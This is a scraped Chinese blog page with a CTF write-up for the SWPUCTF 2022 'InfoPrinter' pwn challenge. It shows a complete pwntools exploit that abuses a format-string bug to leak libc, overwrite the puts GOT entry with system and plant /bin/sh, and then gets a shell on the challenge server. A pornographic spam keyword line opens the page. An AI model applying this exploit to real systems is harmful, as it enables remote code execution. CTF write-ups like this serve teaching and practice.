国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

<mark id="glkpx"></mark>

【pwn】[SWPUCTF 2022 新生賽]InfoPrinter--格式化字符串漏洞，got表劫持，data段修改

2年前作者：GGBomb分類：Toy博客閱讀(30)違法舉報

這篇具有很好參考價值的文章主要介紹了【pwn】[SWPUCTF 2022 新生賽]InfoPrinter--格式化字符串漏洞，got表劫持，data段修改。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方，請大家不吝賜教，您也可以點擊"舉報違法"按鈕提交疑問。

下載附件，checksec檢查程序保護情況：

No RELRO,說明got表可修改

接下來看主程序：

函數(shù)邏輯還是比較簡單，14行出現(xiàn)格式化字符串漏洞，配合pwntools的fmtstr_payload模塊可直接攻擊，然后就是題目提供了libc，然后第10行又泄露puts函數(shù)的地址，可直接計算出基址，然后就是/bin/sh這個字符串的傳入問題，看第15行puts(xx),點進去看xx：

發(fā)現(xiàn)xx存在data段中，我們同樣可以控制格式化字符串漏洞，來達到修改該地址的值為/bin/sh

下一步，確定字符串偏移：

可發(fā)現(xiàn)，字符串偏移為6

exp:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io = remote("node5.anna.nssctf.cn",28063)

libc=ELF("./libc-2.31.so")

elf=ELF("./pwn")

io.recvuntil(b"0x")

puts_addr=int(io.recv(12),16)

base=puts_addr-libc.symbols["puts"]

system_addr=base+libc.symbols["system"]

payload=fmtstr_payload(6,{elf.got["puts"]:system_addr,0x403878:b'/bin/sh\x00'})

io.recvuntil(b'now leak it\n')

io.sendline(payload)

io.interactive()

?

?文章來源地址http://www.zghlxwxcb.cn/news/detail-720253.html

到了這里，關于【pwn】[SWPUCTF 2022 新生賽]InfoPrinter--格式化字符串漏洞，got表劫持，data段修改的文章就介紹完了。如果您還想了解更多內容，請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網！

本文來自互聯(lián)網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。如若轉載，請注明出處：如若內容造成侵權/違法違規(guī)/事實不符，請點擊違法舉報進行投訴反饋，一經查實，立即刪除！

分享到：

領支付寶紅包贊助服務器費用

vscode 無法格式化python代碼、無法格式化C++代碼（vscode格式化失效）另一種解決辦法：用外部工具yapf格式化（yapf工具）
神馬情況，我的vscode死活不能格式化python代碼，還有C++代碼也不能格式化，json代碼都能格式化，為啥到python、C++就不行了。。。。（格式化json代碼）（格式化python代碼）都無反應。。。弄了半天解決不了。。。只能用外部工具解決了，就是麻煩點搞了個外部工具yapf來格
2024年02月05日
瀏覽(97)
DBeaver中使用外部格式化程序對進行sql格式化
本文介紹了如何在DBeaver中使用pgFormatter、sqlprase、sqlformatter等外部格式化程序對sql進行格式化。目錄一、pgFormatter 1.準備工作 2.DBeaver中進行配置二、sqlprase 1.準備工作 2.在DBeaver中配置三、sql-formatter 1.準備工作 2.在DBeaver中配置 pgFormatter本質是perl腳本，所以需要perl運行環(huán)境支
2024年01月25日
瀏覽(123)
使用vscode格式化文檔無效（vue代碼格式化文檔無效）
問題：最近在寫代碼的時候，vscode使用格式化文檔不管用。原因：單頁面使用大量element組件和html代碼導致，vscode識別不了。解決方案： 1、打開設置，點擊右側的圖標打開settings.json文件，在文件中注入代碼。 settings.json文件位置，vscode左下角： ?設置頁面右上角： ?在
2024年02月16日
瀏覽(94)
【vscode 格式化】prettier 格式化之后添加逗號，與eslint沖突
最近格式化文件的時候老是添加逗號，保存的時候會eslint在格式化一遍，將逗號刪掉；就感覺不是很舒服；有兩種方法，一、配置?.prettierrc 文件；文件配置，可直接用，配合eslint使用足夠了 JSON文件是不支持備注的，cv過去時要刪掉注釋 2.就是在設置的搜索框中輸入“vet
2024年02月12日
瀏覽(106)
日期格式化的最佳實踐：如何在Java中處理日期格式化
當涉及到日期格式化時，了解正確的方式和最佳實踐是至關重要的。日期格式化是將日期轉換為特定格式的過程，以便在應用程序開發(fā)中更好地展示、存儲或交互。以下內容展示常用的三種方式在Java中，你可以使用java.time.format.DateTimeFormatter類來格式化日期，并將格式化后
2024年02月07日
瀏覽(100)
vscode中怎樣格式化js代碼_vscode如何格式化代碼
vs code格式化代碼的快捷鍵如下：在Mac上 Shift+ Option+F 在Ubuntu上 Ctrl+ Shift+I 但是自帶的格式化并不能滿足我的需求，這個時候，不得不說插件大法好。代碼格式化為eslint風格需要插件：eslint
2024年02月16日
瀏覽(97)
vue3 codemirror關于 sql 和 json格式化的使用以及深入了解codemirror 使用json格式化提示錯誤的關鍵代碼。包含了json格式化沒有效果和json格式化提示錯誤
后端返回一個json字符串，里面有value1、value2指定字段渲染sql語句，其他渲染json語句。 jsonlint 和 jsonlint-mod 的區(qū)別簡單理解：jsonlint校驗json格式化是否有效，jsonlint-mod用來格式化后同時校驗json格式化是否有效。（1）JSONLint是一種可以驗證JSON格式是否有效的工具。它可以檢查
2024年04月28日
瀏覽(93)
電腦被格式化怎么恢復數(shù)據(jù)？電腦格式化后還能恢復數(shù)據(jù)嗎？
電腦的配件中，硬盤起著不可或缺的作用。它承擔著儲存數(shù)據(jù)的重要任務，但在日常使用過程中，電腦硬盤往往會因為各種原因格式化，有時候是誤操作、有時候是分區(qū)提示格式化、有時候則是中病毒了。而格式化之后，硬盤中的數(shù)據(jù)就會被全部清空。做好了文件備份后格式
2024年02月09日
瀏覽(96)
解決方案：VSCode中配置自動格式化實現(xiàn)Ctrl+S自動格式化代碼
一致的代碼風格不僅僅有助于提高可讀性，還可以減少錯誤和漏洞的產生。在編碼中，在VSCode中配置Prettier插件并實現(xiàn)使用Ctrl+S自動格式化代碼，其可以：根據(jù)事先定義的規(guī)則自動調整代碼的縮進、換行、空格等格式，從而讓所有開發(fā)人員的代碼風格保持一致。這有助于提高
2024年02月06日
瀏覽(101)
【工具分享】程序員在線工具集（json格式化-html格式化-加密工具）
演示地址在線工具集功能介紹 json格式化。 JSON 可以將程序語言對象中表示的一組數(shù)據(jù)轉換為字符串，然后就可以在網絡或者程序之間輕松地傳遞這個字符串，并在需要的時候將它還原為各編程語言所支持的數(shù)據(jù)格式，例如在 PHP 中，可以將 JSON還原為數(shù)組或者一個基本對象
2024年02月12日
瀏覽(99)

<pre id="llr5t"></pre>

<label id="llr5t"><strong id="llr5t"></strong></label>

<kbd id="llr5t"><small id="llr5t"><form id="llr5t"></form></small></kbd><label id="llr5t"><dfn id="llr5t"></dfn></label>